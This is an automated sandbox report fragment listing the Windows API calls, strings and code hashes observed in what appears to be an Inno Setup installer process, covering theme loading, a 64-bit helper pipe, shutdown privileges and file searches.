                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044A897
                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044A8A9
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044A8BB
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044A8CD
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044A8DF
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044A8F1
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044A903
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044A915
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044A927
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044A939
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044A94B
                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044A95D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044A96F
                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044A981
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044A993
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044A9A5
                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044A9B7
                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044A9C9
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044A9DB
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044A9ED
                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044A9FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                  • API String ID: 1968650500-2910565190
                                                                                  • Opcode ID: dd1bb0bf0ee879d1b89488fcd6345e8e37e903421e9fee2017e6af01493a6c26
                                                                                  • Instruction ID: c13d335619f037acf1321fc1db013b741775935e4c473998e399dddbe95d4c6b
                                                                                  • Opcode Fuzzy Hash: dd1bb0bf0ee879d1b89488fcd6345e8e37e903421e9fee2017e6af01493a6c26
                                                                                  • Instruction Fuzzy Hash: 369153F0940754AFEF00EFA6D886E2A3794EB167543500A7BB444EF296D67C9510CF1E
                                                                                  APIs
                                                                                    • Part of subcall function 00454E8C: GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                  • GetTickCount.KERNEL32 ref: 00455A3F
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,00455CD2,?,?,?,?,?,004563CE,?,?,?), ref: 00455A48
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?), ref: 00455A52
                                                                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,00455CD2,?,?,?,?,?,004563CE,?,?,?), ref: 00455A5B
                                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00455AD1
                                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,?,?), ref: 00455ADF
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,0048DA44,00000003,00000000,00000000,00000000,00455C8E), ref: 00455B27
                                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00455C7D,?,00000000,C0000000,00000000,0048DA44,00000003,00000000,00000000,00000000,00455C8E), ref: 00455B60
                                                                                    • Part of subcall function 0042D714: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D727
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00455C09
                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00455C3F
                                                                                  • CloseHandle.KERNEL32(000000FF,00455C84,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00455C77
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandleTime$CloseErrorFileLastNamedPipeProcessSystem$CountCounterCurrentDirectoryLocalPerformanceQueryStateTick
                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$h$helper %d 0x%x
                                                                                  • API String ID: 2735046408-3739555822
                                                                                  • Opcode ID: 8bef29bfe85445925b7e5aaeffc6931d21cacf441b8e535d6b2e83c8446879a3
                                                                                  • Instruction ID: 67291ab669619984b7b4b38923ec865632764fb884c4dc897b8249c29a53ab9f
                                                                                  • Opcode Fuzzy Hash: 8bef29bfe85445925b7e5aaeffc6931d21cacf441b8e535d6b2e83c8446879a3
                                                                                  • Instruction Fuzzy Hash: 2B716670A007449EDB11EB69CC55BAE77F8EB05305F1085AAF908FB283D7789944CF69
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 0045952E
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00459546
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoA), ref: 00459553
                                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoA), ref: 00459560
                                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045956E
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00459726), ref: 00459602
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AllocateHandleInitializeModuleVersion
                                                                                  • String ID: GetNamedSecurityInfoA$SetEntriesInAclW$SetNamedSecurityInfoA$advapi32.dll
                                                                                  • API String ID: 3547715122-3478141794
                                                                                  • Opcode ID: 037b0eec89e2ad9e5ad738673e848789505e5c3b521454ec1d3e2c875e3c087d
                                                                                  • Instruction ID: 3905b052a63ca0f5b1335f70f14c1ce59c4932eff1b4c0ad79e3ad3c42650754
                                                                                  • Opcode Fuzzy Hash: 037b0eec89e2ad9e5ad738673e848789505e5c3b521454ec1d3e2c875e3c087d
                                                                                  • Instruction Fuzzy Hash: 4A512E71A00205EBDB10DF99C941BAEB7F8EB4D711F20406BF944E7282D6799D05CB69
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 0042296C
                                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B36), ref: 0042297C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1631623395-0
                                                                                  • Opcode ID: 8bde8d01dd338d0b03eeb2a4f33e029c47df8e36fe3e28a6539b39318157d538
                                                                                  • Instruction ID: e672ab6125551a289ac9b0a96d2981de165830126fe60f5c04fbf1272a45f832
                                                                                  • Opcode Fuzzy Hash: 8bde8d01dd338d0b03eeb2a4f33e029c47df8e36fe3e28a6539b39318157d538
                                                                                  • Instruction Fuzzy Hash: 9E91B471B00254FFDB10EBA9DA46F9D77F4AB05304F5504AAF900AB392C7B8AE40DB58
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 0041830B
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00418328
                                                                                  • GetWindowRect.USER32(?), ref: 00418344
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00418352
                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 00418367
                                                                                  • ScreenToClient.USER32(00000000), ref: 00418370
                                                                                  • ScreenToClient.USER32(00000000,?), ref: 0041837B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                  • String ID: ,
                                                                                  • API String ID: 2266315723-3772416878
                                                                                  • Opcode ID: ea5a03a43c6ae094b4a80a5b79fcb1712f04c94e776c2030b9b71d4a20dd7980
                                                                                  • Instruction ID: 74c0a796c85e7febbe958464b4f5164f530e81c49943c8f59c0e70a0f422c66d
                                                                                  • Opcode Fuzzy Hash: ea5a03a43c6ae094b4a80a5b79fcb1712f04c94e776c2030b9b71d4a20dd7980
                                                                                  • Instruction Fuzzy Hash: 8D112B71505201AFDB00DF69C885F9B77E8AF49714F18067EBD68DB296C738D900CB69
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004532A7
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004532AD
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004532C9
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004532F0
                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004532F5
                                                                                    • Part of subcall function 00453278: MessageBoxA.USER32(00000000,00000000,00000000,00000030), ref: 00453292
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00453309
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 93195177-3733053543
                                                                                  • Opcode ID: 0f0361f5c6a320cd828c731737f9662f95d7ac997c2d1c801a12f90da90cf272
                                                                                  • Instruction ID: 4eddad16095c998dbfad6a0786d84c2ca8a3620927f05baec3b3e9a89fcb67e5
                                                                                  • Opcode Fuzzy Hash: 0f0361f5c6a320cd828c731737f9662f95d7ac997c2d1c801a12f90da90cf272
                                                                                  • Instruction Fuzzy Hash: 7CF0E170644701B5EA10BF628D07B6B2588AB4178BF54456FBD44E91C3DA7CDA0C466F
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 00459A79
                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 00459A89
                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 00459A99
                                                                                  • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,00474B4B,00000000,00474B74), ref: 00459ABE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CryptVersion
                                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                  • API String ID: 1951258720-508647305
                                                                                  • Opcode ID: a442e024fab17417ed650c9bef59dee47f3ea74e07c2506f3187b69a8a859981
                                                                                  • Instruction ID: a4509d0cc0ce0a6e060064485e03795cbe816883ea1bc169660d5952b9487168
                                                                                  • Opcode Fuzzy Hash: a442e024fab17417ed650c9bef59dee47f3ea74e07c2506f3187b69a8a859981
                                                                                  • Instruction Fuzzy Hash: 25F01DB0505644FAEB05EF37AC4962A3695A785302B04CC3FA704851B6D7BD0D44CF6D
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0048DA00,00000000,00000001,0048D774,?,00000000,004540A6), ref: 00453EEC
                                                                                    • Part of subcall function 00403CBC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CF6
                                                                                    • Part of subcall function 00403CBC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403D01
                                                                                  • CoCreateInstance.OLE32(0048D764,00000000,00000001,0048D774,?,00000000,004540A6), ref: 00453F10
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0045406B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstanceString$AllocByteCharFreeMultiWide
                                                                                  • String ID: CoCreateInstance$IPersistFile::Save$IShellLink::QueryInterface
                                                                                  • API String ID: 2125489766-615220198
                                                                                  • Opcode ID: 8a557358013b7bd78a0d0fd856b621bb58091183a48e437d4ed37e990ae65f00
                                                                                  • Instruction ID: 00904527b4e8d5bb03379ce7bbda3b6f62953cfaacb75c5adbd77cfedd737124
                                                                                  • Opcode Fuzzy Hash: 8a557358013b7bd78a0d0fd856b621bb58091183a48e437d4ed37e990ae65f00
                                                                                  • Instruction Fuzzy Hash: 3C513171A00104AFDB50EFA9C885F9E77F8AF48746F144466F904EB2A2D778DE48CB19
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0048B64E,?,?,00000000,0048E628,?,0048B7D8,00000000,0048B82C,?,?,00000000,0048E628), ref: 0048B567
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0048B5EA
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0048B626,?,00000000,?,00000000,0048B64E,?,?,00000000,0048E628,?,0048B7D8,00000000), ref: 0048B602
                                                                                  • FindClose.KERNEL32(000000FF,0048B62D,0048B626,?,00000000,?,00000000,0048B64E,?,?,00000000,0048E628,?,0048B7D8,00000000,0048B82C), ref: 0048B620
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                                  • String ID: isRS-$isRS-???.tmp
                                                                                  • API String ID: 134685335-3422211394
                                                                                  • Opcode ID: 88f0b26dc48bcc8dc378f353984afb274926ece29fa24012500b6a14c357dc53
                                                                                  • Instruction ID: 03adb9d295dcf2414879e899671e9afadd1cabadf8b114fa491616aea762e59f
                                                                                  • Opcode Fuzzy Hash: 88f0b26dc48bcc8dc378f353984afb274926ece29fa24012500b6a14c357dc53
                                                                                  • Instruction Fuzzy Hash: BD3165719006186EDB14EF65CC41ADEB7BCDB45314F5084B7A908B32A1E7789E418F98
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,0047342A,?,00000000,?,00000000,?,0047356E,00000000,00000000), ref: 004731C5
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004732D5,?,00000000,?,?,00000000,?,00000000,0047342A,?,00000000,?,00000000), ref: 004732B1
                                                                                  • FindClose.KERNEL32(000000FF,004732DC,004732D5,?,00000000,?,?,00000000,?,00000000,0047342A,?,00000000,?,00000000), ref: 004732CF
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0047342A,?,00000000,?,00000000,?,0047356E,00000000), ref: 00473328
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$First$CloseNext
                                                                                  • String ID:
                                                                                  • API String ID: 2001080981-0
                                                                                  • Opcode ID: 2af2aa2bee6a63c3b65d05595d0bc826fbdf8596db8eb4767517ea50561c9447
                                                                                  • Instruction ID: 995c5595af74dcc1a20411f5c42d0ccac28ae8bbb37a4d5dd95915753f04ee7c
                                                                                  • Opcode Fuzzy Hash: 2af2aa2bee6a63c3b65d05595d0bc826fbdf8596db8eb4767517ea50561c9447
                                                                                  • Instruction Fuzzy Hash: 4F71317090021DAFCF21EF95CC41ADFBBB9EB49305F5084AAE808A7291D7399F459F58
                                                                                  APIs
                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004548B9
                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004548E0
                                                                                  • SetForegroundWindow.USER32(?), ref: 004548F1
                                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00454BBC,?,00000000,00454BF8), ref: 00454BA7
                                                                                  Strings
                                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00454A31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                  • API String ID: 2236967946-3182603685
                                                                                  • Opcode ID: 5015e879e11bd9e5d8c5b132de7edcfb5bebdcc9bd220f6f35379009f8dd7fac
                                                                                  • Instruction ID: f8e8931fcb535c8225ddc4a6844b3b41fd2d75ca53396456fce5f64c4d8554b1
                                                                                  • Opcode Fuzzy Hash: 5015e879e11bd9e5d8c5b132de7edcfb5bebdcc9bd220f6f35379009f8dd7fac
                                                                                  • Instruction Fuzzy Hash: 8991D138604244EFD705DF65C955F5ABBF5EB89308F2184BAF9049B792C738AE84CB18
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00453BFC), ref: 00453AF8
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453AFE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                  • API String ID: 1646373207-3712701948
                                                                                  • Opcode ID: 6ed43e3f92f4a9f382347369ce2d37216e7f8668e5b890607e7ae2c11ad1db40
                                                                                  • Instruction ID: 3504732e27587368d36bed9b2c518cc26570cfc2931270eba5bb8f14d4e8135e
                                                                                  • Opcode Fuzzy Hash: 6ed43e3f92f4a9f382347369ce2d37216e7f8668e5b890607e7ae2c11ad1db40
                                                                                  • Instruction Fuzzy Hash: 20315471A04249AFCF01EFA5C8429DEB7B8EF49741F504566E800F7252D6786E088B68
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00417C87
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417CA5
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417CDB
                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D02
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Placement$Iconic
                                                                                  • String ID: ,
                                                                                  • API String ID: 568898626-3772416878
                                                                                  • Opcode ID: 8795b04cb442c3c961eb141f9bb22566596eea11f089eb680b40ba0b6e3a2263
                                                                                  • Instruction ID: 420e2fa922914ce9df0f30d9116d1be66fdd4976f52770e0f08f527958cbfddd
                                                                                  • Opcode Fuzzy Hash: 8795b04cb442c3c961eb141f9bb22566596eea11f089eb680b40ba0b6e3a2263
                                                                                  • Instruction Fuzzy Hash: B0213C71600208ABCF10EF69D8C0ADA77B8AF49314F15416AFD18EF346D778E844CBA8
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,0045E1D0), ref: 0045E091
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0045E19B,?,00000001,00000000,0045E1D0), ref: 0045E0D7
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0045E17D,?,00000000,?,00000000,0045E19B,?,00000001,00000000,0045E1D0), ref: 0045E15D
                                                                                  • FindClose.KERNEL32(000000FF,0045E184,0045E17D,?,00000000,?,00000000,0045E19B,?,00000001,00000000,0045E1D0), ref: 0045E177
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                  • String ID:
                                                                                  • API String ID: 4011626565-0
                                                                                  • Opcode ID: 5484e2770d777b32b7ec02a1beaaf11f41b1baf1992d108d8ee2528a49e1bbe4
                                                                                  • Instruction ID: 1ec623b8566a763af218f26a871a17a85fd28d86d4f3b233ebc3249a4adee439
                                                                                  • Opcode Fuzzy Hash: 5484e2770d777b32b7ec02a1beaaf11f41b1baf1992d108d8ee2528a49e1bbe4
